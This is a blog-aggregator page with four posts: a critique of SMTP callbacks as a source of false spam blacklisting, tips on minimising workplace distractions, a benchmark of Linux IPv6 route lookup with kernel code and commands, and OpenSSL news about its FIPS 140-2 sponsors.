    In my last message to spamrl.com before starting to write this piece, I advised

    I remain unconvinced that the description of that problem is accurate, but investigation at this end can not proceed without at least some supporting evidence such as times of incidents, addresses or even networks affected.
    If there is a problem at this end, it will be fixed. But that will not happen as a result of handwaving and insults. Actual evidence to support further investigation is needed.
    Until verifiable evidence of some sort materializes, I will assume that your end is misinterpreting normal greylisting behavior or acting on unfounded or low-quality reports from less than competent sources.

    The domain bsdly.com was one I registered some years back mainly to fend off somebody who offered to help the owner of the bsdly.net domain acquire the very similar bsdly.com domain at the price of a mere few hundred dollars.

    My response was to spend something like ten dollars (or was it twenty?) to register the domain via my regular registrar. I may even have sent back a reply about trying to sell me what I already owned, but I have not bothered to dig that far back into my archives.

    The domain does receive mail, but is otherwise not actively used. However, as the list of spamtraps can attest (the full list does not display in a regular browser, since some of the traps are interpreted as html tags, if you want to see it all, fetch the text file instead), others have at times tried to pass off something or other with from addresses in that domain.

    But with the knowledge that this outfit's customers are believers in SMTP callbacks as a way to identify spam, here is my hypothesis on what actually happened:

    On August 19th 2017, my greylist scanner identified the following new entries referencing the bsdly.com domain:
    anecowuutp@bsdly.com
    pkgreewaa@bsdly.com
    eemioiyv@bsdly.com
    keerheior@bsdly.com
    mx42.antispamcloud.com-1503146097-testing@bsdly.com
    vbehmonmin@bsdly.com
    euiosvob@bsdly.com
    otjllo@bsdly.com
    akuolsymwt@bsdly.com

    I'll go out on a limb and guess that mx42.antispamcloud.com was contacted by any of the roughly 5000 hosts blacklisted at bsdly.net at the time, with an attempt to deliver a message with a MAIL FROM: of either anecowuutp@bsdly.com, pkgreewaa@bsdly.com, eemioiyv@bsdly.com or perhaps most likely keerheior@bsdly.com, which appears as a bounce-to address in the same hourly greylist dump where mx42.antispamcloud.com-1503146097-testing@bsdly.com first appears as a To: address.

    The first seen time in epoch notation for keerheior@bsdly.com is
    1503143365
    which translates via date -r to
    Sat Aug 19 13:49:25 CEST 2017
    while mx42.antispamcloud.com-1503146097-testing@bsdly.com is first seen here at epoch 1503146138, which translates to Sat Aug 19 14:35:38 CEST 2017.

    The data indicate that this initial (and only) attempt to contact was aimed at the bsdly.com domain's secondary mail exchanger, and was intercepted by the greylisting spamd that sits in the incoming signal path to there. The other epoch-tagged callbacks follow the same pattern, as can be seen from the data preserved here.

    Whatever action or address triggered the callback, the callback appears to have followed the familiar script:
    1. register attempt to deliver mail
    2. look up the domain stated in the MAIL FROM: or perhaps even the HELO or EHLO
    3. contact the domain's mail exchangers with the rump SMTP dialog quoted earlier
    4. with no confirmation or otherwise of anything other than the fact that the domain's mail exchangers do listen on the expected port, proceed to whatever the next step is.
    The known facts at this point are:
    1. a mail system that is set up for SMTP callbacks received a request to deliver mail from keerheior@bsdly.com
    2. the primary mail exchanger for bsdly.com has the IPv4 address 213.187.179.198
    Both of these are likely true. The second we know for sure, and the first is quite likely. What is missing here is any consideration of where the request to deliver came from.

    From the data we have here, we do not have any indication of what host contacted the system that initiated the callback. In a modern configuration, it is reasonable to expect that a receiving system checks for sender validity via any SPF, DKIM or DMARC records available, or for that matter, greylist and wait for the next attempt (in fact, greylisting before performing any other checks - as an OpenBSD spamd(8) setup would do by default - is likely to be the least resource intensive approach).

    We have no indication that the system performing the SMTP callout used any such mechanism to find an indication as to whether the communication partner was in fact in any way connected to the domain it was trying to deliver mail for.

    My hypothesis is that whatever code is running on the SMTP callback adherents' systems does not check the actual sending IP address, but assumes that any message claiming to be from a domain must in fact involve the primary mail exchanger of that domain and since the code likely predates the SPF, DKIM and DMARC specifications by at least a decade, it will not even try to check those types of information. Given the context it is a little odd but perhaps within reason that in all cases we see here, the callback is attempted not to the domain's primary mail exchanger, but the secondary. 

    With somebody or perhaps even several somebodies generating nonsense addresses in the bsdly.com domain at an appreciable rate (see the record of new spamtraps starting May 20th, 2017, alternate location here) and trying to deliver using those fake From: addresses to somewhere doing SMTP callback, it's not much of a stretch to assume that the code was naive enough to conclude that the purported sender domain's primary mail exchanger was indeed performing a dictionary attack.

    The most useful lesson to take home from this sorry affair is likely to be that you need to kill SMTP callback setups in any system where you may find them. In today's environment, SMTP callbacks do not in fact provide useful information that is not available from other public sources, and naive use of results from those lookups is likely to harm unsuspecting third parties.

    So,
    • If you are involved in selling or operating a system that behaves like the one described here and are in fact generating blacklists based on those very naive assumptions, you need to stop doing so right away.

      Your mistaken assumptions help produce bad data which could lead to hard to debug problems for innocent third parties.

      Or as we say in the trade, you are part of the problem.
    • If you are operating a system that does SMTP callbacks but doesn't do much else, you are part of a small problem and likely only inconveniencing yourself and your users.

      The fossil record (aka the accumulated collection spamtraps at bsdly.net) indicates that the callback variant that includes epoch times is rare enough (approximately 100 unique hosts registered over a decade) that callback activity in total volume probably does not rise above the level of random background noise.

      There may of course be callback variants that have other characteristics, and if you see a way to identify those from the data we have, I would very much like to hear from you.
    • If you are a customer of somebody selling antispam products, you have reason to demand an answer to just how, if at all, your antispam supplier utilizes SMTP callbacks. If they think it's a fine and current feature, you have probably been buying snake oil for years.
    • If you are the developer or maintainer of mail server code that contains the SMTP callbacks feature, please remove the code. Leaving it disabled by default is not sufficient. Removing the code is the only way to make sure the misfeature will never again be a source of confusing problems.
    For some hints on what I consider a reasonable and necessary level of transparency in blacklist maintenance, please see my April 2013 piece Maintaining A Publicly Available Blacklist - Mechanisms And Principles.

    The data this article is based on still exists and will be available for further study to requestors with reasonable justification for their request. I welcome comments in the comment field or via email (do factor in any possible greylist delay, though).

    Any corrections or updates that I find necessary based on your responses will be appended to the article.



    Update 2017-09-05: Since the article was originally published, we've seen a handful of further SMTP callback incidents. The last few we've handled by sending the following to the addresses that could be gleaned from whois on the domain name and source IP address (with mx.nxdomain.nx and 192.0.2.74 inserted as placeholders here to protect the ignorant):

    Hi,

    I see from my greylist dumps that the host identifying as 

    mx.nxdomain.nx, IP address 192.0.2.74

    is performing what looks like SMTP callbacks, with the (non-existent of course) address

    mx.nxdomain.nx-1504629949-testing@bsdly.com

    as the RCPT TO: address.

    It is likely that this activity has been triggered by spam campaigns using made up addresses in one of our little-used domains as from: addresses.

    A series of recent incidents here following the same pattern are summarized in the article

    http://bsdly.blogspot.com/2017/08/twenty-plus-years-on-smtp-callbacks-are.html

    Briefly, the callbacks do not work as you expect. Please read the article and then disable that misfeature. Otherwise you will be complicit in generating false positives for your SMTP blacklist.

    If you have any questions or concerns, please let me know.

    Yours sincerely,
    Peter N. M. Hansteen

    If you've received a similarly-worded notice recently, you know why and may be closer to having a sanely run mail service.


    by Peter N. M. Hansteen (noreply@blogger.com) at August 27, 2017 12:44 PM

    August 22, 2017

    Michael Biven

    How I Minimize Distractions

    Being clear on what’s important. Being honest with myself about my own habits. Protect how and where my attention is being pulled. Manage my own calendar.

    I know I’m going to want to work on personal stuff, surf a bit, and do some reading. Knowing that I’m a morning person I start my day off before work on something for myself. Usually it falls under reading, writing, or coding.

    After that I usually scan through my feed reader and read anything that catches my eye, surf a few regular sites and check my personal email.

    When I do start work the first thing I do is about one hour of reactive work. All of those notifications and requests needing my attention get worked on. Right now this usually looks like catching up on email, Slack, Github, and Trello.

    I then try to have a few chunks of time blocked off in my calendar throughout the week as “Focused Work”. This creates space to focus on what I need to work on while leaving time to be available for anyone else.

    The key has been managing my own calendar to allow time for my attention to be directed on the things I want, the things I need, and the needs of others.

    I do keep a running text file where I write out the important or urgent things that need to be done for the day. I’ll also add notes when something interrupts me. When I used to write this out on paper I used this sheet from Dave Seah called The Emergent Task Timer. I found it helped to write out what needs to be done each day and to track what things are pulling my attention away from more important things.

    Because the type of work that I do can be interrupt driven I orientate my team in a similar fashion. By creating that same uninterrupted time for everyone it allows us to minimize the impact of distractions. During the week there are blocks of time where one person is the interruptible person while everyone else snoozes notifications in Slack, ignores email and gets some work done.

    This also means focusing on minimizing the impact of alert / notification fatigue. Have a zero tolerance on things that page you repeatedly or adds unnecessary notifications to your day

    The key really is just those four things I listed at the beginning.

    You have to be clear in what is important both for yourself and for those you’re accountable to.

    You have to be honest with yourself about your own habits. If you keep telling yourself you’re going to do something, but you never do… well there’s probably something else at play. Maybe you’re more in love with the idea rather than with the doing it.

    You need to protect your attention from being pulled away for things that are not important or urgent.

    You can work towards those three points by managing your own calendar. Besides tracking the passage of days a calendar schedules where your attention will be focused on. If you don’t manage it others will manage it for you.

    I view these as ideals that I try to aim for. The circumstances I’m in might not allow me to always to so, but it does give me direction on how I work each day.

    And yeah when I’m in the office I use headphones.

    August 22, 2017 07:54 AM

    August 20, 2017

    Vincent Bernat

    IPv6 route lookup on Linux

    TL;DR: With its implementation of IPv6 routing tables using radix trees, Linux offers subpar performance (450 ns for a full view — 40,000 routes) compared to IPv4 (50 ns for a full view — 500,000 routes) but fair memory usage (20 MiB for a full view).


    In a previous article, we had a look at IPv4 route lookup on Linux. Let’s see how different IPv6 is.

    Lookup trie implementation

    Looking up a prefix in a routing table comes down to find the most specific entry matching the requested destination. A common structure for this task is the trie, a tree structure where each node has its parent as prefix.

    With IPv4, Linux uses a level-compressed trie (or LPC-trie), providing good performances with low memory usage. For IPv6, Linux uses a more classic radix tree (or Patricia trie). There are three reasons for not sharing:

    • The IPv6 implementation (introduced in Linux 2.1.8, 1996) predates the IPv4 implementation based on LPC-tries (in Linux 2.6.13, commit 19baf839ff4a).
    • The feature set is different. Notably, IPv6 supports source-specific routing1 (since Linux 2.1.120, 1998).
    • The IPv4 address space is denser than the IPv6 address space. Level-compression is therefore quite efficient with IPv4. This may not be the case with IPv6.

    The trie in the below illustration encodes 6 prefixes:

    Radix tree

    For more in-depth explanation on the different ways to encode a routing table into a trie and a better understanding of radix trees, see the explanations for IPv4.

    The following figure shows the in-memory representation of the previous radix tree. Each node corresponds to a struct fib6_node. When a node has the RTN_RTINFO flag set, it embeds a pointer to a struct rt6_info containing information about the next-hop.

    Memory representation of a routing table

    The fib6_lookup_1() function walks the radix tree in two steps:

    1. walking down the tree to locate the potential candidate, and
    2. checking the candidate and, if needed, backtracking until a match.

    Here is a slightly simplified version without source-specific routing:

    static struct fib6_node *fib6_lookup_1(struct fib6_node *root,
                                           struct in6_addr  *addr)
    {
        struct fib6_node *fn;
        __be32 dir;
    
        /* Step 1: locate potential candidate */
        fn = root;
        for (;;) {
            struct fib6_node *next;
            dir = addr_bit_set(addr, fn->fn_bit);
            next = dir ? fn->right : fn->left;
            if (next) {
                fn = next;
                continue;
            }
            break;
        }
    
        /* Step 2: check prefix and backtrack if needed */
        while (fn) {
            if (fn->fn_flags & RTN_RTINFO) {
                struct rt6key *key;
                key = fn->leaf->rt6i_dst;
                if (ipv6_prefix_equal(&key->addr, addr, key->plen)) {
                    if (fn->fn_flags & RTN_RTINFO)
                        return fn;
                }
            }
    
            if (fn->fn_flags & RTN_ROOT)
                break;
            fn = fn->parent;
        }
    
        return NULL;
    }
    

    Caching

    While IPv4 lost its route cache in Linux 3.6 (commit 5e9965c15ba8), IPv6 still has a caching mechanism. However cache entries are directly put in the radix tree instead of a distinct structure.

    Since Linux 2.1.30 (1997) and until Linux 4.2 (commit 45e4fd26683c), almost any successful route lookup inserts a cache entry in the radix tree. For example, a router forwarding a ping between 2001:db8:1::1 and 2001:db8:3::1 would get those two cache entries:

    $ ip -6 route show cache
    2001:db8:1::1 dev r2-r1  metric 0
        cache
    2001:db8:3::1 via 2001:db8:2::2 dev r2-r3  metric 0
        cache
    

    These entries are cleaned up by the ip6_dst_gc() function controlled by the following parameters:

    $ sysctl -a | grep -F net.ipv6.route
    net.ipv6.route.gc_elasticity = 9
    net.ipv6.route.gc_interval = 30
    net.ipv6.route.gc_min_interval = 0
    net.ipv6.route.gc_min_interval_ms = 500
    net.ipv6.route.gc_thresh = 1024
    net.ipv6.route.gc_timeout = 60
    net.ipv6.route.max_size = 4096
    net.ipv6.route.mtu_expires = 600
    

    The garbage collector is triggered at most every 500 ms when there are more than 1024 entries or at least every 30 seconds. The garbage collection won’t run for more than 60 seconds, except if there are more than 4096 routes. When running, it will first delete entries older than 30 seconds. If the number of cache entries is still greater than 4096, it will continue to delete more recent entries (but no more recent than 512 jiffies, which is the value of gc_elasticity) after a 500 ms pause.

    Starting from Linux 4.2 (commit 45e4fd26683c), only a PMTU exception would create a cache entry. A router doesn’t have to handle those exceptions, so only hosts would get cache entries. And they should be pretty rare. Martin KaFai Lau explains:

    Out of all IPv6 RTF_CACHE routes that are created, the percentage that has a different MTU is very small. In one of our end-user facing proxy server, only 1k out of 80k RTF_CACHE routes have a smaller MTU. For our DC traffic, there is no MTU exception.

    Here is how a cache entry with a PMTU exception looks like:

    $ ip -6 route show cache
    2001:db8:1::50 via 2001:db8:1::13 dev out6  metric 0
        cache  expires 573sec mtu 1400 pref medium
    

    Performance

    We consider three distinct scenarios:

    Excerpt of an Internet full view
    In this scenario, Linux acts as an edge router attached to the default-free zone. Currently, the size of such a routing table is a little bit above 40,000 routes.
    /48 prefixes spread linearly with different densities
    Linux acts as a core router inside a datacenter. Each customer or rack gets one or several /48 networks, which need to be routed around. With a density of 1, /48 subnets are contiguous.
    /128 prefixes spread randomly in a fixed /108 subnet
    Linux acts as a leaf router for a /64 subnet with hosts getting their IP using autoconfiguration. It is assumed all hosts share the same OUI and therefore, the first 40 bits are fixed. In this scenario, neighbor reachability information for the /64 subnet are converted into routes by some external process and redistributed among other routers sharing the same subnet2.

    Route lookup performance

    With the help of a small kernel module, we can accurately benchmark3 the ip6_route_output_flags() function and correlate the results with the radix tree size:

    Maximum depth and lookup time

    Getting meaningful results is challenging due to the size of the address space. None of the scenarios have a fallback route and we only measure time for successful hits4. For the full view scenario, only the range from 2400::/16 to 2a06::/16 is scanned (it contains more than half of the routes). For the /128 scenario, the whole /108 subnet is scanned. For the /48 scenario, the range from the first /48 to the last one is scanned. For each range, 5000 addresses are picked semi-randomly. This operation is repeated until we get 5000 hits or until 1 million tests have been executed.

    The relation between the maximum depth and the lookup time is incomplete and I can’t explain the difference of performance between the different densities of the /48 scenario.

    We can extract two important performance points:

    • With a full view, the lookup time is 450 ns. This is almost ten times the budget for forwarding at 10 Gbps — which is about 50 ns.
    • With an almost empty routing table, the lookup time is 150 ns. This is still over the time budget for forwarding at 10 Gbps.

    With IPv4, the lookup time for an almost empty table was 20 ns while the lookup time for a full view (500,000 routes) was a bit above 50 ns. How to explain such a difference? First, the maximum depth of the IPv4 LPC-trie with 500,000 routes was 6, while the maximum depth of the IPv6 radix tree for 40,000 routes is 40.

    Second, while both IPv4’s fib_lookup() and IPv6’s ip6_route_output_flags() functions have a fixed cost implied by the evaluation of routing rules, IPv4 has several optimizations when the rules are left unmodified5. Those optimizations are removed on the first modification. If we cancel those optimizations, the lookup time for IPv4 is impacted by about 30 ns. This still leaves a 100 ns difference with IPv6 to be explained.

    Let’s compare how time is spent in each lookup function. Here is a CPU flamegraph for IPv4’s fib_lookup():

    IPv4 route lookup flamegraph

    Only 50% of the time is spent in the actual route lookup. The remaining time is spent evaluating the routing rules (about 30 ns). This ratio is dependent on the number of routes we inserted (only 1000 in this example). It should be noted the fib_table_lookup() function is executed twice: once with the local routing table and once with the main routing table.

    The equivalent flamegraph for IPv6’s ip6_route_output_flags() is depicted below:

    IPv6 route lookup flamegraph

    Here is an approximate breakdown on the time spent:

    • 50% is spent in the route lookup in the main table,
    • 15% is spent in handling locking (IPv4 is using the more efficient RCU mechanism),
    • 5% is spent in the route lookup of the local table,
    • most of the remaining is spent in routing rule evaluation (about 100 ns)6.

    Why does the evaluation of routing rules is less efficient with IPv6? Again, I don’t have a definitive answer.

    History

    The following graph shows the performance progression of route lookups through Linux history:

    IPv6 route lookup performance progression

    All kernels are compiled with GCC 4.9 (from Debian Jessie). This version is able to compile older kernels as well as current ones. The kernel configuration is the default one with CONFIG_SMP, CONFIG_IPV6, CONFIG_IPV6_MULTIPLE_TABLES and CONFIG_IPV6_SUBTREES options enabled. Some other unrelated options are enabled to be able to boot them in a virtual machine and run the benchmark.

    There are three notable performance changes:

    • In Linux 3.1, Eric Dumazet delays a bit the copy of route metrics to fix the undesirable sharing of route-specific metrics by all cache entries (commit 21efcfa0ff27). Each cache entry now gets its own metrics, which explains the performance hit for the non-/128 scenarios.
    • In Linux 3.9, Yoshifuji Hideaki removes the reference to the neighbor entry in struct rt6_info (commit 887c95cc1da5). This should have lead to a performance increase. The small regression may be due to cache-related issues.
    • In Linux 4.2, Martin KaFai Lau prevents the creation of cache entries for most route lookups. The most sensible performance improvement comes with commit 4b32b5ad31a6. The second one is from commit 45e4fd26683c, which effectively removes creation of cache entries, except for PMTU exceptions.

    Insertion performance

    Another interesting performance-related metric is the insertion time. Linux is able to insert a full view in less than two seconds. For some reason, the insertion time is not linear above 50,000 routes and climbs very fast to 60 seconds for 500,000 routes.

    Insertion time

    Despite its more complex insertion logic, the IPv4 subsystem is able to insert 2 million routes in less than 10 seconds.

    Memory usage

    Radix tree nodes (struct fib6_node) and routing information (struct rt6_info) are allocated with the slab allocator7. It is therefore possible to extract the information from /proc/slabinfo when the kernel is booted with the slab_nomerge flag:

    # sed -ne 2p -e '/^ip6_dst/p' -e '/^fib6_nodes/p' /proc/slabinfo | cut -f1 -d:
    ♯  name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab>
    fib6_nodes         76101  76104     64   63    1
    ip6_dst_cache      40090  40090    384   10    1
    

    In the above example, the used memory is 76104×64+40090×384 bytes (about 20 MiB). The number of struct rt6_info matches the number of routes while the number of nodes is roughly twice the number of routes:

    Nodes

    The memory usage is therefore quite predictable and reasonable, as even a small single-board computer can support several full views (20 MiB for each):

    Memory usage

    The LPC-trie used for IPv4 is more efficient: when 512 MiB of memory is needed for IPv6 to store 1 million routes, only 128 MiB are needed for IPv4. The difference is mainly due to the size of struct rt6_info (336 bytes) compared to the size of IPv4’s struct fib_alias (48 bytes): IPv4 puts most information about next-hops in struct fib_info structures that are shared with many entries.

    Conclusion

    The takeaways from this article are:

    • upgrade to Linux 4.2 or more recent to avoid excessive caching,
    • route lookups are noticeably slower compared to IPv4 (by an order of magnitude),
    • CONFIG_IPV6_MULTIPLE_TABLES option incurs a fixed penalty of 100 ns by lookup,
    • memory usage is fair (20 MiB for 40,000 routes).

    Compared to IPv4, IPv6 in Linux doesn’t foster the same interest, notably in term of optimizations. Hopefully, things are changing as its adoption and use “at scale” are increasing.


    1. For a given destination prefix, it’s possible to attach source-specific prefixes:

      ip -6 route add 2001:db8:1::/64 \
        from 2001:db8:3::/64 \
        via fe80::1 \
        dev eth0
      

      Lookup is first done on the destination address, then on the source address. 

    2. This is quite different of the classic scenario where Linux acts as a gateway for a /64 subnet. In this case, the neighbor subsystem stores the reachability information for each host and the routing table only contains a single /64 prefix. 

    3. The measurements are done in a virtual machine with one vCPU and no neighbors. The host is an Intel Core i5-4670K running at 3.7 GHz during the experiment (CPU governor set to performance). The benchmark is single-threaded. Many lookups are performed and the result reported is the median value. Timings of individual runs are computed from the TSC

    4. Most of the packets in the network are expected to be routed to a destination. However, this also means the backtracking code path is not used in the /128 and /48 scenarios. Having a fallback route gives far different results and make it difficult to ensure we explore the address space correctly. 

    5. The exact same optimizations could be applied for IPv6. Nobody did it yet

    6. Compiling out table support effectively removes those last 100 ns. 

    7. There is also per-CPU pointers allocated directly (4 bytes per entry per CPU on a 64-bit architecture). We ignore this detail. 

    by Vincent Bernat at August 20, 2017 04:53 PM

    August 17, 2017

    OpenSSL

    FIPS 140-2: Thanks and Farewell to SafeLogic

    We’ve had a change in the stakeholder aspect of this new FIPS 140 validation effort. The original sponsor, SafeLogic, with whom we jump-started this effort a year ago and who has worked with us since then, is taking a well-deserved bow due to a change in circumstances. Supporting this effort has been quite a strain for a relatively small company, but SafeLogic has left us in a fairly good position. Without SafeLogic we wouldn’t have made it this far, and while I don’t anticipate any future SafeLogic involvement with this effort from this point on, I remain enormously grateful to SafeLogic and CEO Ray Potter for taking on such a bold and ambitious venture.

    As announced here recently Oracle remains a sponsor but will hopefully not be the only sponsor for long. We will continue to partner with Acumen and we have been working extensively with Ashit Vora and Tony Busciglio there to sort out some new ideas.

    No code has been written yet as we’re still developing a technical strategy and design. We’ve considered some new approaches to structuring the module, perhaps even as a related set of “bound” modules instead of one monolithic module as for past validations. Carefully sorting through the implications of design decisions for FIPS 140 requirements is a tedious but necessary process, and I think we’ll make faster progress overall by not rushing to the coding stage.

    As always we’re interested in hearing from stakeholders (and especially prospective sponsors!), please contact me at marquess@openssl.com or Jim Wright at Oracle at jim.wright@oracle.com.

    August 17, 2017 04:00 PM